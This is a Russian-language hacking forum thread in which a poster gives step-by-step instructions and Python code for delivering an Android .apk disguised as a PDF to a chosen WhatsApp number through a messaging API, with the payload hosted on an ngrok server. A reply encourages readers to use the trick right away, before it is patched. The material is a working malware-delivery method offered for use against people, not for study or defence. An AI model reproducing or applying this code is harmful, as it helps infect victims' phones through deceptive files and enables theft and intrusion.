What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Android (.apk) может распространяться через поддельный PDF-документ

whitehaker

Light Weight
Депозит
$0
Тут видео как работает и тут взято, не реклама, сюда видео не могу закинуть.
https://t.me/hacklair_Official/29

Вредоносное ПО для Android (.apk) может распространяться через поддельный PDF-документ, манипулируя расширением файла в приложении WhatsApp. Доказательство концепции (PoC) доступно в этом репозитории.

Шаг 1:
Сначала создайте бесплатную учетную запись на https://user.ultramsg.com/signup.php. Мы будем использовать её для управления API.

Шаг 2:
Нажмите кнопку «Add Instance» (Добавить экземпляр) и создайте новый экземпляр.

Шаг 3:
Заполните соответствующие поля в файле `wp.py` сгенерированной информацией об API и войдите в своё приложение WhatsApp, используя QR-код, найденный в информации об экземпляре.

Шаг 4:
Введите целевой номер в поле «enter number» (введите номер) и загрузите ваш файл на сервер (это может быть ngrok или python сервер. Если вы тестируете локально, вы можете использовать XAMPP).

Шаг 5:
Запустите Python-код и наблюдайте за отправкой сообщения.

Python: Скопировать в буфер обмена
Code:
import requests
import json

url = "https://api.ultramsg.com/instance../messages/document"

payload = {
    "token": "ultramsg token",
    "to": "enter number(target number)",
    "document": "your host(ex:https://08f8-185-177-126-102.ngrok-free.app/up/test.apk.)",
    "filename": "Test.PDF",
    "content_type": "application/vnd.android.package-archive",
    "priority": "10",
    "referenceId": "",
    "msgId": "",
    "mentions": ""
}

headers = {'Content-Type': 'application/json'}

response = requests.request("POST", url, data=json.dumps(payload), headers=headers)

print(response.text)
 
Ссылка поменялась в котором можете посмотреть видео и откуда код взят
t.me

FreeSource Hub

Вредоносное ПО для Android (.apk) может распространяться через поддельный PDF-документ, Шаг 1: Создайте аккаунт на https://user.ultramsg.com/signup.php. Мы будем использовать её для управления API. Шаг 2: Нажмите кнопку «Add Instance» и создайте новый экземпляр. Шаг 3: Заполните соответствующие...
t.me
t.me
 
bigheadguy сказал(а):
кто то практиковал уже?
хочется развернутый отзыв об этом
Нажмите, чтобы раскрыть...
Уже практикуют, но тебе не напишут пока не заюзают фичу, зачем давать знать что это работает что бы прикрыли лавочку, так что мой совет бери и юзай а не жди когда тебе напишут что УЖЕ не работает ))
Сейчас и во время написании статьи работает.
 
Top